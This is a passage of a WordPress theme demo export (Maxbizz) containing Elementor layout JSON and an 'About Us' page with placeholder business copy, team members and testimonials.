cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"9b85fb3","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"52ae6c7","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"aedecf5","elType":"widget","settings":{"title":"III Columns","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0aaf919","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"c3e0f34","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"67b4e55","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"b8d273a","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"8de19bc","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"097ada7","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"34bf2f6","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"a92b63b","elType":"widget","settings":{"title":"II Columns","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"a598d52","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"40c0145","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"50ffc56","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"69df804","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"415941f","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"010c8ae","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"093badb","elType":"widget","settings":{"title":"Text Elements","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"127fad1","elType":"widget","settings":{"editor":"<p>Three of these curves describe an initial Covid-related spike in demand, and three describe a short-term hit. Where each group begins to diverge, however, is in what\u2019s likely to <span style=\"color: #ff8523;\">happen to demand over the next several years.<\/span> Think, for example, of <span style=\"color: #1b1d21; font-weight: 600;\">personal computer monitors or other types<\/span> of goods that were declining pre-pandemic and fall into the \u201cshort-term spike, long-term decline\u201d archetype. The story is different for online grocery shopping and collaboration services like Zoom (short-term spike, long-term growth), both of which were growing steadily before the pandemic. <em>Experimentation during the crisis has convinced more and more customers that ordering or meeting online makes sense, pulling forward demand that will likely stick<\/em>.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ad421e7","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"4ca1f31","elType":"widget","settings":{"title":"Highlights","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5249e8e","elType":"widget","settings":{"editor":"<p><span style=\"background: #ff8523; color: #fff;\">Most firms have set up a war room to triage<\/span> their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"c9dd334","elType":"widget","settings":{"editor":"<p><span style=\"background: #262832; color: #fff;\">Most firms have set up a war room to triage<\/span> their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ff8b1b8","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"006991d","elType":"widget","settings":{"title":"Dropcaps","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e9b8646","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e41f15a","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"82d3b4a","elType":"widget","settings":{"editor":"<p><span class=\"drop-cap\" style=\"background: #ff8523;\"><span class=\"drop-cap-letter\">M<\/span><\/span>ost firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"ab0df6a","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"336d7e3","elType":"widget","settings":{"editor":"<p><span class=\"drop-cap\"><span class=\"drop-cap-letter\">M<\/span><\/span>ost firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"9c81ff3","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"55e9a19","elType":"widget","settings":{"title":"Listings","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"297dfb9","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"8d62022","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"b9ca8ad","elType":"widget","settings":{"editor":"<ol><li>Customer Experience<\/li><li>New Business Innovation<\/li><li>Sales and Marketing<\/li><\/ol>","text_color":"#5F5F5F","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_weight":"400","typography_line_height":{"unit":"px","size":42,"sizes":[]},"__globals__":{"text_color":""}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"7b081bc","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"0cf1b0f","elType":"widget","settings":{"editor":"<ul><li>Customer Experience<\/li><li>New Business Innovation<\/li><li>Sales and Marketing<\/li><\/ul>","text_color":"#5F5F5F","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_weight":"400","typography_line_height":{"unit":"px","size":42,"sizes":[]},"__globals__":{"text_color":""}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"6f037fd","elType":"column","settings":{"_column_size":25,"_inline_size":null,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"f728999","elType":"widget","settings":{"icon_list":[{"text":"Customer Experience","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/down-arrow.svg","id":480},"library":"svg"},"_id":"6733193"},{"text":"New Business Innovation","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/down-arrow.svg","id":480},"library":"svg"},"_id":"7a2cb9d"},{"text":"Sales and Marketing","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/down-arrow.svg","id":480},"library":"svg"},"_id":"51805a9"}],"space_between":{"unit":"px","size":12,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":11,"sizes":[]},"text_indent":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true},{"id":"6484bff","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"fff55a7","elType":"widget","settings":{"icon_list":[{"text":"Customer Experience","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/add.svg","id":481},"library":"svg"},"_id":"6733193"},{"text":"New Business Innovation","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/add.svg","id":481},"library":"svg"},"_id":"7a2cb9d"},{"text":"Sales and Marketing","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/add.svg","id":481},"library":"svg"},"_id":"51805a9"}],"space_between":{"unit":"px","size":12,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":11,"sizes":[]},"text_indent":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true}],"isInner":true},{"id":"99d54a9","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"c5b4eb2","elType":"widget","settings":{"title":"Blockquote","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0310507","elType":"section","settings":{"gap":"extended","structure":"30","layout":"full_width"},"elements":[{"id":"40df4db","elType":"column","settings":{"_column_size":33,"_inline_size":20},"elements":[],"isInner":true},{"id":"8a5f517","elType":"column","settings":{"_column_size":33,"_inline_size":59.33200000000000073896444519050419330596923828125},"elements":[{"id":"c1a7fe1","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"768ca46","elType":"column","settings":{"_column_size":33,"_inline_size":20},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:6:{s:7:"heading";a:3:{s:5:"count";i:14;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:14;s:11:"header_size";i:13;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:14;}}}}s:11:"text-editor";a:3:{s:5:"count";i:23;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:23;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:9;s:15:"_padding_mobile";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:2;s:21:"typography_typography";i:2;s:22:"typography_font_family";i:2;s:22:"typography_font_weight";i:2;s:22:"typography_line_height";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:2:{s:5:"color";i:6;s:3:"gap";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:6;s:15:"_padding_mobile";i:6;}}}}s:6:"column";a:3:{s:5:"count";i:19;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:19;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:7;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:3:"gap";i:6;s:6:"layout";i:6;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:6;s:14:"padding_mobile";i:2;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:2;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>About Us</title>
		<link>http://wpdemo.archiwp.com/maxbizz/about-us/</link>
		<pubDate>Mon, 07 Sep 2020 09:01:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=487</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="630" height="475" src="https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg 630w, https://maxbizz.s3.amazonaws.com/images/image1-about-us-300x226.jpg 300w" sizes="(max-width: 630px) 100vw, 630px" />											
	        about company	        <h3>Make Digital Marketing  Work For Your Business</h3>	    
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent into the firm, acquiring new companies, and developing new capabilities, for example, in design.</p><hr /><p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach.</p>		
										<img width="204" height="52" src="https://maxbizz.s3.amazonaws.com/images/signature.png" alt="" loading="lazy" />											
			<h6>Peter Adams</h6>		
		<p>co-founder of company</p>		
        	<h6>Trusted <br>Clients</h6>      				        
        	<h6>Finished <br>Projects</h6>      				        
        	<h6>Years of <br>Experience</h6>      				        
        	<h6>Visited<br>Conferences</h6>      				        
	        what we do	        <h3>Creating Your Startup Business</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features1-about-us.jpg" alt="Accounting &amp; Finance"></a>					
						<h5><a href="#">Accounting & Finance</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features2-about-us.jpg" alt="Management Skills"></a>					
						<h5><a href="#">Management Skills</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features3-about-us.jpg" alt="Business Planning"></a>					
						<h5><a href="#">Business Planning</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
										<img width="516" height="625" src="https://maxbizz.s3.amazonaws.com/images/image2-about-us.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image2-about-us.png 516w, https://maxbizz.s3.amazonaws.com/images/image2-about-us-248x300.png 248w" sizes="(max-width: 516px) 100vw, 516px" />											
	        main principles	        <h3>Global Reach with Local  Understanding</h3>	    
		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
		        <a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06.svg" alt=""></figure></a>		    
	        testimonials	        <h3>What People Say About Us</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="http://wpdemo.archiwp.com/maxbizz/wp-content/themes/maxbizz/images/avatar-1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="http://wpdemo.archiwp.com/maxbizz/wp-content/themes/maxbizz/images/avatar-1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
	        our team	        <h3>Our Skilled Leaders</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Monica Black</h6>				chief communication officer			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team2-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Perish</h6>				chief business project			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team3-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Olivia Woodson</h6>				international consultant			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team4.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team4-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Adams</h6>				co-founder of company			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-team">Explore More </a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>487</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 09:01:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 09:01:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[about-us]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[489]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"aeaf1cb","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"120","right":"0","bottom":"115","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"e209ac4","elType":"column","settings":{"_column_size":50,"_inline_size":50,"_inline_size_tablet":100},"elements":[{"id":"34ca8c4","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-about-us.jpg","id":491},"image_size":"full","align":"left","width_tablet":{"unit":"%","size":100,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"-60","bottom":"0","left":"0","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"1feb286","elType":"column","settings":{"_column_size":50,"_inline_size":50,"_inline_size_tablet":100,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"100","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"841e06b","elType":"widget","settings":{"sub":"about company","title":"Make Digital Marketing  Work For Your Business","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"bb4f4ed","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent into the firm, acquiring new companies, and developing new capabilities, for example, in design.<\/p><hr \/><p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"983ee34","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"3d77923","elType":"column","settings":{"_column_size":50,"_inline_size":null,"border_border":"solid","border_width":{"unit":"px","top":"0","right":"1","bottom":"0","left":"0","isLinked":false},"border_width_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"border_color":"#00000026"},"elements":[{"id":"0f29b46","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/signature.png","id":492},"image_size":"full","align":"left","align_tablet":"right","align_mobile":"left","_padding_tablet":{"unit":"px","top":"0","right":"35","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"02cefd4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"30","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"d2c189c","elType":"widget","settings":{"title":"Peter Adams","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"4146a85","elType":"widget","settings":{"editor":"<p>co-founder of 